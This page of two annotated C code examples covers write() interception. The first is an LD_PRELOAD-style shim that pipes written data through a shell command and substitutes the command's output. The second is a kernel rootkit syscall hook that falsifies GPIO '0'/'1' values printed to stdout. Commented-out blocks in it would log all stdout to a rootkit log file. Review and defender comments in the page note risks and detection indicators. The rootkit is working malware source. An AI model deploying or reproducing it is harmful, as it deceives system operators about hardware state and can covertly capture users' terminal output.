Esempio n. 1
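/*
 * Interposed replacement for write(2).
 *
 * The real implementation is looked up with dlsym(RTLD_NEXT, "write"), so this
 * definition is meant to sit in front of libc's (presumably injected with
 * LD_PRELOAD; the loading mechanism is not shown here).
 *
 * For descriptors listed in `filedesyes` the caller's bytes are base64-encoded,
 * appended to `command`, run through the shell with popen(), and whatever the
 * command prints is written to the descriptor instead of the original data.
 * Every other descriptor is passed straight through.
 *
 * Returns nbyte when the transformed data was written, the real write()'s
 * result on the pass-through path, and -1 on failure.
 *
 * Security notes for anyone reviewing or deploying this shim:
 *  - The encoded payload travels on a shell command line. While the child
 *    runs it is visible to other local users through the process listing,
 *    and large writes can exceed the system's argument-length limit.
 *  - The command line is only safe from shell interpretation as long as
 *    base64() emits the standard alphabet and `command`/`endcommand` quote
 *    it correctly. Neither is visible here; verify both.
 *  - NOTE(review): the child shell inherits the environment; if this library
 *    is injected through an environment variable the child is presumably
 *    hooked as well. Confirm this cannot recurse on the hooked descriptors.
 */
ssize_t write(int fildes, const void *buf, size_t nbyte) {
	/* Correct prototype: the real write() returns ssize_t, not int *. */
	ssize_t (*original_write)(int, const void *, size_t);

	original_write = dlsym(RTLD_NEXT, "write");
	if (original_write == NULL) {
		/* No underlying write() to forward to; fail instead of jumping to NULL. */
		return -1;
	}

	if (isvalueinarray(fildes, filedesyes, 2) != 1) {
		/*
		 * Pass-through path: report the real result so callers still see
		 * errors and short writes (the old code always claimed nbyte).
		 */
		return original_write(fildes, buf, nbyte);
	}

	/* NOTE(review): ownership of base64()'s result is not visible here; if it
	 * allocates, the buffer is never released on this path. */
	char *based = base64((const char *)buf, nbyte);
	if (based == NULL) {
		/* Fail closed: never fall back to writing the plaintext. */
		return -1;
	}

	/*
	 * Room for command + payload + at most two bytes of endcommand + NUL.
	 * The previous stack array omitted the last three bytes and overflowed;
	 * a heap buffer also keeps large writes from exhausting the stack.
	 */
	size_t capacity = strlen(command) + strlen(based) + 2 + 1;
	char *toexecute = malloc(capacity);
	if (toexecute == NULL) {
		return -1;
	}
	/* "%.2s" keeps the old strncat(..., endcommand, 2) limit. */
	snprintf(toexecute, capacity, "%s%s%.2s", command, based, endcommand);

	FILE *fp = popen(toexecute, "r");
	free(toexecute);
	if (fp == NULL) {
		/*
		 * Report through the return value. printf() on stdout would re-enter
		 * this hook, and exit() would take the host process down with it.
		 */
		return -1;
	}

	ssize_t result = (ssize_t)nbyte;
	char retcommand[2048];

	/* Relay the command's output chunk by chunk to the real descriptor. */
	while (fgets(retcommand, sizeof retcommand, fp) != NULL) {
		if (original_write(fildes, retcommand, strlen(retcommand)) < 0) {
			result = -1;
			break;
		}
	}

	pclose(fp);

	return result;
}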
Esempio n. 2
/*
 * Replacement handler for write that falsifies what a process sees on stdout.
 *
 * Behaviour visible in this function:
 *  - The unmodified request is always forwarded first through original_write
 *    and its result is kept in ret.
 *  - While HOOK_WRITE is set and fd is 1, a buffer starting with "0\n" or
 *    "1\n" has its first byte flipped in place and a second two-byte write is
 *    issued; the function then reports count to the caller.
 *  - If neither pattern matches, HOOK_WRITE is cleared and ret is returned.
 *  - Two disabled blocks below would append stdout data to
 *    /home/pi/rootkit_logfile.
 *
 * How this handler is installed and where HOOK_WRITE is set are not shown
 * here (presumably elsewhere in the same kernel module).
 *
 * Defender notes: on a host running this code, values printed by user-space
 * tools cannot be trusted and should be verified out of band. The printk
 * strings "In case 1" / "In case 2" in the kernel log, and the log-file path
 * in the disabled blocks, are usable indicators.
 */
asmlinkage ssize_t hacked_write(int fd, char *buf, size_t count)
{
	// Forward the caller's data unchanged before any inspection.
	int ret = original_write(fd, buf, count);
	// NOTE(review): buf is presumably a user-space pointer; it is read and
	// written below directly, with no copy or access check visible here.
	char *needle_ptr = buf;
	//struct file *file;
	//mm_segment_t old_fs;
	//loff_t pos = 0;


	//char *command_to_find = "echotest";//"echoout>/sys/class/gpio/gpio4/direction";
	//bool exported = false;
	
	//if(CheckGPIOIsOutput(4)){	// if GPIO 4 is exported, start hijacking output written
	if(HOOK_WRITE){	// if cat /sys/class/gpio/gpio4/value is called, hack the output
		
		// NOTE(review): the second byte is read without checking count >= 2.
		// Reported "0\n" on stdout is turned into "1\n". The original buffer
		// was already written above, so the descriptor receives both versions.
		if(*needle_ptr=='0' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) {
			printk("In case 1\n");	// leaves a trace in the kernel log
			needle_ptr[0]='1';	// modifies the caller's buffer in place
			original_write(fd, needle_ptr, 2);
			return count;
		}
		// Mirror case: reported "1\n" is turned into "0\n".
		else if (*needle_ptr=='1' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) {
			printk("In case 2\n");	// leaves a trace in the kernel log
			needle_ptr[0]='0';		
			original_write(fd, needle_ptr, 2);
			return count;
		}
		// Only reached when neither pattern matched: disarm the hook.
		HOOK_WRITE=false;
	}
	// Disabled: when IS_COMMAND is set, append the stdout buffer to a log file
	// opened from kernel context.
	/*
	if(IS_COMMAND && fd==1){	// if user pressed enter
		
		struct file *file;
		mm_segment_t old_fs;
		loff_t pos = 0;
	
		old_fs = get_fs();
		set_fs(KERNEL_DS);

		//disable_file_hiding();
		file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644);

		if(IS_ERR(file)){
			//printk("CREATE FILE ERROR %d...\n", ERR_PTR(file));
			//return -1;
		}
		else{
			if(file && ret>0){
				
				pos=0;
				vfs_write(file, buf, strlen(buf), &pos);								
				printk("Copying from user sys_write: %s...\n\n", buf);		
				filp_close(file, NULL);
				//enable_file_hiding();
			}else{
				if(!file)
					printk("OPEN FILE ERROR 111...\n");
				else if(ret<=0)
					printk("OPEN FILE ERROR 222...\n");
			}
		}
		set_fs(old_fs);
		

		IS_COMMAND=false;
	}*/

	// Disabled: unconditional variant of the same logging for every stdout write.
/*	if(fd==1){

		old_fs = get_fs();
		set_fs(KERNEL_DS);
	
		file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644);
	
		if(IS_ERR(file)){
			//printk("CREATE FILE ERROR %d...\n", ERR_PTR(file));
			//return -1;
		}
		else{
			if(file && ret>0){
					pos=0;
					vfs_write(file, buf, strlen(buf), &pos);
					//vfs_write(file, test_buffer, strlen(test_buffer), &pos);								
					printk("Copying from user...\n\n");		
		
				filp_close(file, NULL);
			}else{
				if(!file)
					printk("OPEN FILE ERROR 111...\n");
				else if(ret<=0)
					printk("OPEN FILE ERROR 222...\n");
			}
		}
		set_fs(old_fs);
	}*/
	// Untampered path: hand back the result of the first, unmodified write.
	return ret;
}